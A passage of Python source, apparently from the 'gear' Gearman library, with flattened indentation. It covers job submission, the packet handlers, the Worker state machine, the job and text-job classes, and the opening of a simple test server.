unique = job.binary_unique
data = b'\x00'.join((job.binary_name, unique, job.binary_arguments))
if background:
if precedence == PRECEDENCE_NORMAL:
cmd = constants.SUBMIT_JOB_BG
elif precedence == PRECEDENCE_LOW:
cmd = constants.SUBMIT_JOB_LOW_BG
elif precedence == PRECEDENCE_HIGH:
cmd = constants.SUBMIT_JOB_HIGH_BG
else:
raise ConfigurationError("Invalid precedence value")
else:
if precedence == PRECEDENCE_NORMAL:
cmd = constants.SUBMIT_JOB
elif precedence == PRECEDENCE_LOW:
cmd = constants.SUBMIT_JOB_LOW
elif precedence == PRECEDENCE_HIGH:
cmd = constants.SUBMIT_JOB_HIGH
else:
raise ConfigurationError("Invalid precedence value")
packet = Packet(constants.REQ, cmd, data)
attempted_connections = set()
while True:
if attempted_connections == set(self.active_connections):
break
conn = self.getConnection()
task = SubmitJobTask(job)
conn.pending_tasks.append(task)
attempted_connections.add(conn)
try:
self.sendPacket(packet, conn)
except Exception:
# Error handling is all done by sendPacket
continue
complete = task.wait(timeout)
if not complete:
self.log.error("Connection %s timed out waiting for a "
"response to a submit job request: %s" %
(conn, job))
self._lostConnection(conn)
continue
if not job.handle:
self.log.error("Connection %s sent an error in "
"response to a submit job request: %s" %
(conn, job))
continue
job.connection = conn
return
raise GearmanError("Unable to submit job to any connected servers")
def handleJobCreated(self, packet):
"""Handle a JOB_CREATED packet.
Updates the appropriate :py:class:`Job` with the newly
returned job handle.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
task = packet.connection.pending_tasks.pop(0)
if not isinstance(task, SubmitJobTask):
msg = ("Unexpected response received to submit job "
"request: %s" % packet)
self.log.error(msg)
self._lostConnection(packet.connection)
raise GearmanError(msg)
job = task.job
job.handle = packet.data
packet.connection.related_jobs[job.handle] = job
task.setComplete()
self.log.debug("Job created; %s" % job)
return job
def handleWorkComplete(self, packet):
"""Handle a WORK_COMPLETE packet.
Updates the referenced :py:class:`Job` with the returned data
and removes it from the list of jobs associated with the
connection.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
data = packet.getArgument(1, True)
if data:
job.data.append(data)
job.complete = True
job.failure = False
del packet.connection.related_jobs[job.handle]
self.log.debug("Job complete; %s data: %s" %
(job, job.data))
return job
def handleWorkFail(self, packet):
"""Handle a WORK_FAIL packet.
Updates the referenced :py:class:`Job` with the returned data
and removes it from the list of jobs associated with the
connection.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
job.complete = True
job.failure = True
del packet.connection.related_jobs[job.handle]
self.log.debug("Job failed; %s" % job)
return job
def handleWorkException(self, packet):
"""Handle a WORK_Exception packet.
Updates the referenced :py:class:`Job` with the returned data
and removes it from the list of jobs associated with the
connection.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
job.exception = packet.getArgument(1, True)
job.complete = True
job.failure = True
del packet.connection.related_jobs[job.handle]
self.log.debug("Job exception; %s exception: %s" %
(job, job.exception))
return job
def handleWorkData(self, packet):
"""Handle a WORK_DATA packet.
Updates the referenced :py:class:`Job` with the returned data.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
data = packet.getArgument(1, True)
if data:
job.data.append(data)
self.log.debug("Job data; job: %s data: %s" %
(job, job.data))
return job
def handleWorkWarning(self, packet):
"""Handle a WORK_WARNING packet.
Updates the referenced :py:class:`Job` with the returned data.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
data = packet.getArgument(1, True)
if data:
job.data.append(data)
job.warning = True
self.log.debug("Job warning; %s data: %s" %
(job, job.data))
return job
def handleWorkStatus(self, packet):
"""Handle a WORK_STATUS packet.
Updates the referenced :py:class:`Job` with the returned data.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
job.numerator = packet.getArgument(1)
job.denominator = packet.getArgument(2)
try:
job.fraction_complete = (float(job.numerator) /
float(job.denominator))
except Exception:
job.fraction_complete = None
self.log.debug("Job status; %s complete: %s/%s" %
(job, job.numerator, job.denominator))
return job
def handleStatusRes(self, packet):
"""Handle a STATUS_RES packet.
Updates the referenced :py:class:`Job` with the returned data.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: The :py:class:`Job` object associated with the job request.
:rtype: :py:class:`Job`
"""
job = packet.getJob()
job.known = (packet.getArgument(1) == b'1')
job.running = (packet.getArgument(2) == b'1')
job.numerator = packet.getArgument(3)
job.denominator = packet.getArgument(4)
try:
job.fraction_complete = (float(job.numerator) /
float(job.denominator))
except Exception:
job.fraction_complete = None
return job
def handleOptionRes(self, packet):
"""Handle an OPTION_RES packet.
Updates the set of options for the connection.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: None.
"""
task = packet.connection.pending_tasks.pop(0)
if not isinstance(task, OptionReqTask):
msg = ("Unexpected response received to option "
"request: %s" % packet)
self.log.error(msg)
self._lostConnection(packet.connection)
raise GearmanError(msg)
packet.connection.handleOptionRes(packet.getArgument(0))
task.setComplete()
class FunctionRecord(object):
"""Represents a function that should be registered with Gearman.
This class only directly needs to be instatiated for use with
:py:meth:`Worker.setFunctions`. If a timeout value is supplied,
the function will be registered with CAN_DO_TIMEOUT.
:arg str name: The name of the function to register.
:arg numeric timeout: The timeout value (optional).
"""
def __init__(self, name, timeout=None):
self.name = name
self.timeout = timeout
def __repr__(self):
return '<gear.FunctionRecord 0x%x name: %s timeout: %s>' % (
id(self), self.name, self.timeout)
class BaseJob(object):
def __init__(self, name, arguments, unique=None, handle=None):
self._name = convert_to_bytes(name)
self._validate_arguments(arguments)
self._arguments = convert_to_bytes(arguments)
self._unique = convert_to_bytes(unique)
self.handle = handle
self.connection = None
def _validate_arguments(self, arguments):
if (not isinstance(arguments, bytes) and
not isinstance(arguments, bytearray)):
raise TypeError("arguments must be of type bytes or bytearray")
@property
def arguments(self):
return self._arguments
@arguments.setter
def arguments(self, value):
self._arguments = value
@property
def unique(self):
return self._unique
@unique.setter
def unique(self, value):
self._unique = value
@property
def name(self):
if isinstance(self._name, six.binary_type):
return self._name.decode('utf-8')
return self._name
@name.setter
def name(self, value):
if isinstance(value, six.text_type):
value = value.encode('utf-8')
self._name = value
@property
def binary_name(self):
return self._name
@property
def binary_arguments(self):
return self._arguments
@property
def binary_unique(self):
return self._unique
def __repr__(self):
return '<gear.Job 0x%x handle: %s name: %s unique: %s>' % (
id(self), self.handle, self.name, self.unique)
class WorkerJob(BaseJob):
"""A job that Gearman has assigned to a Worker. Not intended to
be instantiated directly, but rather returned by
:py:meth:`Worker.getJob`.
:arg str handle: The job handle assigned by gearman.
:arg str name: The name of the job.
:arg bytes arguments: The opaque data blob passed to the worker
as arguments.
:arg str unique: A byte string to uniquely identify the job to Gearman
(optional).
The following instance attributes are available:
**name** (str)
The name of the job. Assumed to be utf-8.
**arguments** (bytes)
The opaque data blob passed to the worker as arguments.
**unique** (str or None)
The unique ID of the job (if supplied).
**handle** (bytes)
The Gearman job handle.
**connection** (:py:class:`Connection` or None)
The connection associated with the job. Only set after the job
has been submitted to a Gearman server.
"""
def __init__(self, handle, name, arguments, unique=None):
super(WorkerJob, self).__init__(name, arguments, unique, handle)
def sendWorkData(self, data=b''):
"""Send a WORK_DATA packet to the client.
:arg bytes data: The data to be sent to the client (optional).
"""
data = self.handle + b'\x00' + data
p = Packet(constants.REQ, constants.WORK_DATA, data)
self.connection.sendPacket(p)
def sendWorkWarning(self, data=b''):
"""Send a WORK_WARNING packet to the client.
:arg bytes data: The data to be sent to the client (optional).
"""
data = self.handle + b'\x00' + data
p = Packet(constants.REQ, constants.WORK_WARNING, data)
self.connection.sendPacket(p)
def sendWorkStatus(self, numerator, denominator):
"""Send a WORK_STATUS packet to the client.
Sends a numerator and denominator that together represent the
fraction complete of the job.
:arg numeric numerator: The numerator of the fraction complete.
:arg numeric denominator: The denominator of the fraction complete.
"""
data = (self.handle + b'\x00' +
str(numerator).encode('utf8') + b'\x00' +
str(denominator).encode('utf8'))
p = Packet(constants.REQ, constants.WORK_STATUS, data)
self.connection.sendPacket(p)
def sendWorkComplete(self, data=b''):
"""Send a WORK_COMPLETE packet to the client.
:arg bytes data: The data to be sent to the client (optional).
"""
data = self.handle + b'\x00' + data
p = Packet(constants.REQ, constants.WORK_COMPLETE, data)
self.connection.sendPacket(p)
def sendWorkFail(self):
"Send a WORK_FAIL packet to the client."
p = Packet(constants.REQ, constants.WORK_FAIL, self.handle)
self.connection.sendPacket(p)
def sendWorkException(self, data=b''):
"""Send a WORK_EXCEPTION packet to the client.
:arg bytes data: The exception data to be sent to the client
(optional).
"""
data = self.handle + b'\x00' + data
p = Packet(constants.REQ, constants.WORK_EXCEPTION, data)
self.connection.sendPacket(p)
class Worker(BaseClient):
"""A Gearman worker.
:arg str client_id: The client ID to provide to Gearman. It will
appear in administrative output and be appended to the name of
the logger (e.g., gear.Worker.client_id).
:arg str worker_id: The client ID to provide to Gearman. It will
appear in administrative output and be appended to the name of
the logger (e.g., gear.Worker.client_id). This parameter name
is deprecated, use client_id instead.
"""
job_class = WorkerJob
def __init__(self, client_id=None, worker_id=None):
if not client_id or worker_id:
raise Exception("A client_id must be provided")
if worker_id:
client_id = worker_id
super(Worker, self).__init__(client_id)
self.log = logging.getLogger("gear.Worker.%s" % (self.client_id,))
self.worker_id = client_id
self.functions = {}
self.job_lock = threading.Lock()
self.waiting_for_jobs = 0
self.job_queue = queue_mod.Queue()
def __repr__(self):
return '<gear.Worker 0x%x>' % id(self)
def registerFunction(self, name, timeout=None):
"""Register a function with Gearman.
If a timeout value is supplied, the function will be
registered with CAN_DO_TIMEOUT.
:arg str name: The name of the function to register.
:arg numeric timeout: The timeout value (optional).
"""
name = convert_to_bytes(name)
self.functions[name] = FunctionRecord(name, timeout)
if timeout:
self._sendCanDoTimeout(name, timeout)
else:
self._sendCanDo(name)
connections = self.active_connections[:]
for connection in connections:
if connection.state == "SLEEP":
connection.changeState("IDLE")
self._updateStateMachines()
def unRegisterFunction(self, name):
"""Remove a function from Gearman's registry.
:arg str name: The name of the function to remove.
"""
name = convert_to_bytes(name)
del self.functions[name]
self._sendCantDo(name)
def setFunctions(self, functions):
"""Replace the set of functions registered with Gearman.
Accepts a list of :py:class:`FunctionRecord` objects which
represents the complete set of functions that should be
registered with Gearman. Any existing functions will be
unregistered and these registered in their place. If the
empty list is supplied, then the Gearman registered function
set will be cleared.
:arg list functions: A list of :py:class:`FunctionRecord` objects.
"""
self._sendResetAbilities()
self.functions = {}
for f in functions:
if not isinstance(f, FunctionRecord):
raise InvalidDataError(
"An iterable of FunctionRecords is required.")
self.functions[f.name] = f
for f in self.functions.values():
if f.timeout:
self._sendCanDoTimeout(f.name, f.timeout)
else:
self._sendCanDo(f.name)
def _sendCanDo(self, name):
self.broadcast_lock.acquire()
try:
p = Packet(constants.REQ, constants.CAN_DO, name)
self.broadcast(p)
finally:
self.broadcast_lock.release()
def _sendCanDoTimeout(self, name, timeout):
self.broadcast_lock.acquire()
try:
data = name + b'\x00' + timeout
p = Packet(constants.REQ, constants.CAN_DO_TIMEOUT, data)
self.broadcast(p)
finally:
self.broadcast_lock.release()
def _sendCantDo(self, name):
self.broadcast_lock.acquire()
try:
p = Packet(constants.REQ, constants.CANT_DO, name)
self.broadcast(p)
finally:
self.broadcast_lock.release()
def _sendResetAbilities(self):
self.broadcast_lock.acquire()
try:
p = Packet(constants.REQ, constants.RESET_ABILITIES, b'')
self.broadcast(p)
finally:
self.broadcast_lock.release()
def _sendPreSleep(self, connection):
p = Packet(constants.REQ, constants.PRE_SLEEP, b'')
self.sendPacket(p, connection)
def _sendGrabJobUniq(self, connection=None):
p = Packet(constants.REQ, constants.GRAB_JOB_UNIQ, b'')
if connection:
self.sendPacket(p, connection)
else:
self.broadcast(p)
def _onConnect(self, conn):
self.broadcast_lock.acquire()
try:
# Called immediately after a successful (re-)connection
p = Packet(constants.REQ, constants.SET_CLIENT_ID, self.client_id)
conn.sendPacket(p)
super(Worker, self)._onConnect(conn)
for f in self.functions.values():
if f.timeout:
data = f.name + b'\x00' + f.timeout
p = Packet(constants.REQ, constants.CAN_DO_TIMEOUT, data)
else:
p = Packet(constants.REQ, constants.CAN_DO, f.name)
conn.sendPacket(p)
conn.changeState("IDLE")
finally:
self.broadcast_lock.release()
# Any exceptions will be handled by the calling function, and the
# connection will not be put into the pool.
def _onActiveConnection(self, conn):
self.job_lock.acquire()
try:
if self.waiting_for_jobs > 0:
self._updateStateMachines()
finally:
self.job_lock.release()
def _updateStateMachines(self):
connections = self.active_connections[:]
for connection in connections:
if (connection.state == "IDLE" and self.waiting_for_jobs > 0):
self._sendGrabJobUniq(connection)
connection.changeState("GRAB_WAIT")
if (connection.state != "IDLE" and self.waiting_for_jobs < 1):
connection.changeState("IDLE")
def getJob(self):
"""Get a job from Gearman.
Blocks until a job is received. This method is re-entrant, so
it is safe to call this method on a single worker from
multiple threads. In that case, one of them at random will
receive the job assignment.
:returns: The :py:class:`WorkerJob` assigned.
:rtype: :py:class:`WorkerJob`.
:raises InterruptedError: If interrupted (by
:py:meth:`stopWaitingForJobs`) before a job is received.
"""
self.job_lock.acquire()
try:
# self.running gets cleared during _shutdown(), before the
# stopWaitingForJobs() is called. This check has to
# happen with the job_lock held, otherwise there would be
# a window for race conditions between manipulation of
# "running" and "waiting_for_jobs".
if not self.running:
raise InterruptedError()
self.waiting_for_jobs += 1
self.log.debug("Get job; number of threads waiting for jobs: %s" %
self.waiting_for_jobs)
try:
job = self.job_queue.get(False)
except queue_mod.Empty:
job = None
if not job:
self._updateStateMachines()
finally:
self.job_lock.release()
if not job:
job = self.job_queue.get()
self.log.debug("Received job: %s" % job)
if job is None:
raise InterruptedError()
return job
def stopWaitingForJobs(self):
"""Interrupts all running :py:meth:`getJob` calls, which will raise
an exception.
"""
self.job_lock.acquire()
try:
while True:
connections = self.active_connections[:]
now = time.time()
ok = True
for connection in connections:
if connection.state == "GRAB_WAIT":
# Replies to GRAB_JOB should be fast, give up if we've
# been waiting for more than 5 seconds.
if now - connection.state_time > 5:
self._lostConnection(connection)
else:
ok = False
if ok:
break
else:
self.job_lock.release()
time.sleep(0.1)
self.job_lock.acquire()
while self.waiting_for_jobs > 0:
self.waiting_for_jobs -= 1
self.job_queue.put(None)
self._updateStateMachines()
finally:
self.job_lock.release()
def _shutdown(self):
self.job_lock.acquire()
try:
# The upstream _shutdown() will clear the "running" bool. Because
# that is a variable which is used for proper synchronization of
# the exit within getJob() which might be about to be called from a
# separate thread, it's important to call it with a proper lock
# being held.
super(Worker, self)._shutdown()
finally:
self.job_lock.release()
self.stopWaitingForJobs()
def handleNoop(self, packet):
"""Handle a NOOP packet.
Sends a GRAB_JOB_UNIQ packet on the same connection.
GRAB_JOB_UNIQ will return jobs regardless of whether they have
been specified with a unique identifier when submitted. If
they were not, then :py:attr:`WorkerJob.unique` attribute
will be None.
:arg Packet packet: The :py:class:`Packet` that was received.
"""
self.job_lock.acquire()
try:
if packet.connection.state == "SLEEP":
self.log.debug("Sending GRAB_JOB_UNIQ")
self._sendGrabJobUniq(packet.connection)
packet.connection.changeState("GRAB_WAIT")
else:
self.log.debug("Received unexpecetd NOOP packet on %s" %
packet.connection)
finally:
self.job_lock.release()
def handleNoJob(self, packet):
"""Handle a NO_JOB packet.
Sends a PRE_SLEEP packet on the same connection.
:arg Packet packet: The :py:class:`Packet` that was received.
"""
self.job_lock.acquire()
try:
if packet.connection.state == "GRAB_WAIT":
self.log.debug("Sending PRE_SLEEP")
self._sendPreSleep(packet.connection)
packet.connection.changeState("SLEEP")
else:
self.log.debug("Received unexpected NO_JOB packet on %s" %
packet.connection)
finally:
self.job_lock.release()
def handleJobAssign(self, packet):
"""Handle a JOB_ASSIGN packet.
Adds a WorkerJob to the internal queue to be picked up by any
threads waiting in :py:meth:`getJob`.
:arg Packet packet: The :py:class:`Packet` that was received.
"""
handle = packet.getArgument(0)
name = packet.getArgument(1)
arguments = packet.getArgument(2, True)
return self._handleJobAssignment(packet, handle, name,
arguments, None)
def handleJobAssignUnique(self, packet):
"""Handle a JOB_ASSIGN_UNIQ packet.
Adds a WorkerJob to the internal queue to be picked up by any
threads waiting in :py:meth:`getJob`.
:arg Packet packet: The :py:class:`Packet` that was received.
"""
handle = packet.getArgument(0)
name = packet.getArgument(1)
unique = packet.getArgument(2)
if unique == b'':
unique = None
arguments = packet.getArgument(3, True)
return self._handleJobAssignment(packet, handle, name,
arguments, unique)
def _handleJobAssignment(self, packet, handle, name, arguments, unique):
job = self.job_class(handle, name, arguments, unique)
job.connection = packet.connection
self.job_lock.acquire()
try:
packet.connection.changeState("IDLE")
self.waiting_for_jobs -= 1
self.log.debug("Job assigned; number of threads waiting for "
"jobs: %s" % self.waiting_for_jobs)
self.job_queue.put(job)
self._updateStateMachines()
finally:
self.job_lock.release()
class Job(BaseJob):
"""A job to run or being run by Gearman.
:arg str name: The name of the job.
:arg bytes arguments: The opaque data blob to be passed to the worker
as arguments.
:arg str unique: A byte string to uniquely identify the job to Gearman
(optional).
The following instance attributes are available:
**name** (str)
The name of the job. Assumed to be utf-8.
**arguments** (bytes)
The opaque data blob passed to the worker as arguments.
**unique** (str or None)
The unique ID of the job (if supplied).
**handle** (bytes or None)
The Gearman job handle. None if no job handle has been received yet.
**data** (list of byte-arrays)
The result data returned from Gearman. Each packet appends an
element to the list. Depending on the nature of the data, the
elements may need to be concatenated before use. This is returned
as a snapshot copy of the data to prevent accidental attempts at
modification which will be lost.
**exception** (bytes or None)
Exception information returned from Gearman. None if no exception
has been received.
**warning** (bool)
Whether the worker has reported a warning.
**complete** (bool)
Whether the job is complete.
**failure** (bool)
Whether the job has failed. Only set when complete is True.
**numerator** (bytes or None)
The numerator of the completion ratio reported by the worker.
Only set when a status update is sent by the worker.
**denominator** (bytes or None)
The denominator of the completion ratio reported by the
worker. Only set when a status update is sent by the worker.
**fraction_complete** (float or None)
The fractional complete ratio reported by the worker. Only set when
a status update is sent by the worker.
**known** (bool or None)
Whether the job is known to Gearman. Only set by handleStatusRes() in
response to a getStatus() query.
**running** (bool or None)
Whether the job is running. Only set by handleStatusRes() in
response to a getStatus() query.
**connection** (:py:class:`Connection` or None)
The connection associated with the job. Only set after the job
has been submitted to a Gearman server.
"""
data_type = list
def __init__(self, name, arguments, unique=None):
super(Job, self).__init__(name, arguments, unique)
self._data = self.data_type()
self._exception = None
self.warning = False
self.complete = False
self.failure = False
self.numerator = None
self.denominator = None
self.fraction_complete = None
self.known = None
self.running = None
@property
def binary_data(self):
for value in self._data:
if isinstance(value, six.text_type):
value = value.encode('utf-8')
yield value
@property
def data(self):
return self._data
@data.setter
def data(self, value):
if not isinstance(value, self.data_type):
raise ValueError(
"data attribute must be {}".format(self.data_type))
self._data = value
@property
def exception(self):
return self._exception
@exception.setter
def exception(self, value):
self._exception = value
class TextJobArguments(object):
"""Assumes utf-8 arguments in addition to name
If one is always dealing in valid utf-8, using this job class relieves one
of the need to encode/decode constantly."""
def _validate_arguments(self, arguments):
pass
@property
def arguments(self):
args = self._arguments
if isinstance(args, six.binary_type):
return args.decode('utf-8')
return args
@arguments.setter
def arguments(self, value):
if not isinstance(value, six.binary_type):
value = value.encode('utf-8')
self._arguments = value
class TextJobUnique(object):
"""Assumes utf-8 unique
If one is always dealing in valid utf-8, using this job class relieves one
of the need to encode/decode constantly."""
@property
def unique(self):
unique = self._unique
if isinstance(unique, six.binary_type):
return unique.decode('utf-8')
return unique
@unique.setter
def unique(self, value):
if not isinstance(value, six.binary_type):
value = value.encode('utf-8')
self._unique = value
class TextList(list):
def append(self, x):
if isinstance(x, six.binary_type):
x = x.decode('utf-8')
super(TextList, self).append(x)
def extend(self, iterable):
def _iter():
for value in iterable:
if isinstance(value, six.binary_type):
yield value.decode('utf-8')
else:
yield value
super(TextList, self).extend(_iter)
def insert(self, i, x):
if isinstance(x, six.binary_type):
x = x.decode('utf-8')
super(TextList, self).insert(i, x)
class TextJob(TextJobArguments, TextJobUnique, Job):
""" Sends and receives UTF-8 arguments and data.
Use this instead of Job when you only expect to send valid UTF-8 through
gearman. It will automatically encode arguments and work data as UTF-8, and
any jobs fetched from this worker will have their arguments and data
decoded assuming they are valid UTF-8, and thus return strings.
Attributes and method signatures are thes ame as Job except as noted here:
** arguments ** (str) This will be returned as a string.
** data ** (tuple of str) This will be returned as a tuble of strings.
"""
data_type = TextList
@property
def exception(self):
exception = self._exception
if isinstance(exception, six.binary_type):
return exception.decode('utf-8')
return exception
@exception.setter
def exception(self, value):
if not isinstance(value, six.binary_type):
value = value.encode('utf-8')
self._exception = value
class TextWorkerJob(TextJobArguments, TextJobUnique, WorkerJob):
""" Sends and receives UTF-8 arguments and data.
See TextJob. sendWorkData and sendWorkWarning accept strings
and will encode them as UTF-8.
"""
def sendWorkData(self, data=''):
"""Send a WORK_DATA packet to the client.
:arg str data: The data to be sent to the client (optional).
"""
if isinstance(data, six.text_type):
data = data.encode('utf8')
return super(TextWorkerJob, self).sendWorkData(data)
def sendWorkWarning(self, data=''):
"""Send a WORK_WARNING packet to the client.
:arg str data: The data to be sent to the client (optional).
"""
if isinstance(data, six.text_type):
data = data.encode('utf8')
return super(TextWorkerJob, self).sendWorkWarning(data)
def sendWorkComplete(self, data=''):
"""Send a WORK_COMPLETE packet to the client.
:arg str data: The data to be sent to the client (optional).
"""
if isinstance(data, six.text_type):
data = data.encode('utf8')
return super(TextWorkerJob, self).sendWorkComplete(data)
def sendWorkException(self, data=''):
"""Send a WORK_EXCEPTION packet to the client.
:arg str data: The data to be sent to the client (optional).
"""
if isinstance(data, six.text_type):
data = data.encode('utf8')
return super(TextWorkerJob, self).sendWorkException(data)
class TextWorker(Worker):
""" Sends and receives UTF-8 only.
See TextJob.
"""
job_class = TextWorkerJob
class BaseBinaryJob(object):
""" For the case where non-utf-8 job names are needed. It will function
exactly like Job, except that the job name will not be decoded."""
@property
def name(self):
return self._name
class BinaryWorkerJob(BaseBinaryJob, WorkerJob):
pass
class BinaryJob(BaseBinaryJob, Job):
pass
# Below are classes for use in the server implementation:
class ServerJob(BinaryJob):
"""A job record for use in a server.
:arg str name: The name of the job.
:arg bytes arguments: The opaque data blob to be passed to the worker
as arguments.
:arg str unique: A byte string to uniquely identify the job to Gearman
(optional).
The following instance attributes are available:
**name** (str)
The name of the job.
**arguments** (bytes)
The opaque data blob passed to the worker as arguments.
**unique** (str or None)
The unique ID of the job (if supplied).
**handle** (bytes or None)
The Gearman job handle. None if no job handle has been received yet.
**data** (list of byte-arrays)
The result data returned from Gearman. Each packet appends an
element to the list. Depending on the nature of the data, the
elements may need to be concatenated before use.
**exception** (bytes or None)
Exception information returned from Gearman. None if no exception
has been received.
**warning** (bool)
Whether the worker has reported a warning.
**complete** (bool)
Whether the job is complete.
**failure** (bool)
Whether the job has failed. Only set when complete is True.
**numerator** (bytes or None)
The numerator of the completion ratio reported by the worker.
Only set when a status update is sent by the worker.
**denominator** (bytes or None)
The denominator of the completion ratio reported by the
worker. Only set when a status update is sent by the worker.
**fraction_complete** (float or None)
The fractional complete ratio reported by the worker. Only set when
a status update is sent by the worker.
**known** (bool or None)
Whether the job is known to Gearman. Only set by handleStatusRes() in
response to a getStatus() query.
**running** (bool or None)
Whether the job is running. Only set by handleStatusRes() in
response to a getStatus() query.
**client_connection** :py:class:`Connection`
The client connection associated with the job.
**worker_connection** (:py:class:`Connection` or None)
The worker connection associated with the job. Only set after the job
has been assigned to a worker.
"""
def __init__(self, handle, name, arguments, client_connection,
unique=None):
super(ServerJob, self).__init__(name, arguments, unique)
self.handle = handle
self.client_connection = client_connection
self.worker_connection = None
del self.connection
class ServerAdminRequest(AdminRequest):
"""An administrative request sent to a server."""
def __init__(self, connection):
super(ServerAdminRequest, self).__init__()
self.connection = connection
def isComplete(self, data):
end_index_newline = data.find(b'\n')
if end_index_newline != -1:
self.command = data[:end_index_newline]
# Remove newline from data
x = end_index_newline + 1
return (True, data[x:])
else:
return (False, None)
class NonBlockingConnection(Connection):
"""A Non-blocking connection to a Gearman Client."""
def __init__(self, host, port, ssl_key=None, ssl_cert=None, ssl_ca=None,
client_id='unknown', keepalive=False, tcp_keepidle=7200,
tcp_keepintvl=75, tcp_keepcnt=9):
super(NonBlockingConnection, self).__init__(
host, port, ssl_key,
ssl_cert, ssl_ca, client_id, keepalive,
tcp_keepidle, tcp_keepintvl, tcp_keepcnt)
self.send_queue = []
def connect(self):
super(NonBlockingConnection, self).connect()
if self.connected and self.conn:
self.conn.setblocking(0)
def _readRawBytes(self, bytes_to_read):
try:
buff = self.conn.recv(bytes_to_read)
except ssl.SSLWantReadError:
raise RetryIOError()
except ssl.SSLWantWriteError:
raise RetryIOError()
except socket.error as e:
if e.errno == errno.EAGAIN:
# Read operation would block, we're done until
# epoll flags this connection again
raise RetryIOError()
raise
return buff
def sendPacket(self, packet):
"""Append a packet to this connection's send queue. The Client or
Server must manage actually sending the data.
:arg :py:class:`Packet` packet The packet to send
"""
self.log.debug("Queuing packet to %s: %s" % (self, packet))
self.send_queue.append(packet.toBinary())
self.sendQueuedData()
def sendRaw(self, data):
"""Append raw data to this connection's send queue. The Client or
Server must manage actually sending the data.
:arg bytes data The raw data to send
"""
self.log.debug("Queuing data to %s: %s" % (self, data))
self.send_queue.append(data)
self.sendQueuedData()
def sendQueuedData(self):
"""Send previously queued data to the socket."""
try:
while len(self.send_queue):
data = self.send_queue.pop(0)
r = 0
try:
r = self.conn.send(data)
except ssl.SSLWantReadError:
raise RetryIOError()
except ssl.SSLWantWriteError:
raise RetryIOError()
except socket.error as e:
if e.errno == errno.EAGAIN:
self.log.debug("Write operation on %s would block"
% self)
raise RetryIOError()
else:
raise
finally:
data = data[r:]
if data:
self.send_queue.insert(0, data)
except RetryIOError:
pass
class ServerConnection(NonBlockingConnection):
"""A Connection to a Gearman Client."""
def __init__(self, addr, conn, use_ssl, client_id):
if client_id:
self.log = logging.getLogger("gear.ServerConnection.%s" %
(client_id,))
else:
self.log = logging.getLogger("gear.ServerConnection")
self.send_queue = []
self.admin_requests = []
self.host = addr[0]
self.port = addr[1]
self.conn = conn
self.conn.setblocking(0)
self.input_buffer = b''
self.need_bytes = False
self.use_ssl = use_ssl
self.client_id = None
self.functions = set()
self.related_jobs = {}
self.ssl_subject = None
if self.use_ssl:
for x in conn.getpeercert()['subject']:
if x[0][0] == 'commonName':
self.ssl_subject = x[0][1]
self.log.debug("SSL subject: %s" % self.ssl_subject)
self.changeState("INIT")
def _getAdminRequest(self):
return ServerAdminRequest(self)
def _putAdminRequest(self, req):
# The server does not need to keep track of admin requests
# that have been partially received; it will simply create a
# new instance the next time it tries to read.
pass
def __repr__(self):
return '<gear.ServerConnection 0x%x name: %s host: %s port: %s>' % (
id(self), self.client_id, self.host, self.port)
class Server(BaseClientServer):
"""A simple gearman server implementation for testing
(not for production use).
:arg int port: The TCP port on which to listen.
:arg str ssl_key: Path to the SSL private key.
:arg str ssl_cert: Path to the SSL certificate.
:arg str ssl_ca: Path to the CA certificate.
:arg str statsd_host: statsd hostname. None means disabled
(the default).
:arg str statsd_port: statsd port (defaults to 8125).
:arg str statsd_prefix: statsd key prefix.
:arg str client_id: The ID associated with this server.
It will be appending to the name of the logger (e.g.,
gear.Server.server_id). Defaults to None (unused).
:arg ACL acl: An :py:class:`ACL` object if the server should apply
access control rules to its connections.
:arg str host: Host name or IPv4/IPv6 address to bind to. Defaults
to "whatever getaddrinfo() returns", which might be IPv4-only.
:arg bool keepalive: Whether to use TCP keepalives
:arg int tcp_keepidle: Idle time after which to start keepalives sending
:arg int tcp_keepintvl: Interval in seconds between TCP keepalives
:arg int tcp_keepcnt: Count of TCP keepalives to send before disconnect
"""
edge_bitmask = select.EPOLLET
error_bitmask = (select.EPOLLERR | select.EPOLLHUP | edge_bitmask)
read_bitmask = (select.EPOLLIN | error_bitmask)
readwrite_bitmask = (select.EPOLLOUT | read_bitmask)
def __init__(self, port=4730, ssl_key=None, ssl_cert=None, ssl_ca=None,
statsd_host=None, statsd_port=8125, statsd_prefix=None,
server_id=None, acl=None, host=None, keepalive=False,
tcp_keepidle=7200, tcp_keepintvl=75, tcp_keepcnt=9):
self.port = port
self.ssl_key = ssl_key
self.ssl_cert = ssl_cert
self.ssl_ca = ssl_ca
self.high_queue = []
self.normal_queue = []
self.low_queue = []
self.jobs = {}
self.running_jobs = 0
self.waiting_jobs = 0
self.total_jobs = 0
self.functions = set()
self.max_handle = 0
self.acl = acl
self.connect_wake_read, self.connect_wake_write = os.pipe()
self.poll = select.epoll()
# Reverse mapping of fd -> connection
self.connection_map = {}
self.use_ssl = False
if all([self.ssl_key, self.ssl_cert, self.ssl_ca]):
self.use_ssl = True
# Get all valid passive listen addresses, then sort by family to prefer
# ipv6 if available.
addrs = socket.getaddrinfo(host, self.port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0,
socket.AI_PASSIVE |
socket.AI_ADDRCONFIG)
addrs.sort(key=lambda addr: addr[0], reverse=True)
for res in addrs:
af, socktype, proto, canonname, sa = res
try:
self.socket = socket.socket(af, socktype, proto)
self.socket.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
if keepalive and hasattr(socket, 'TCP_KEEPIDLE'):
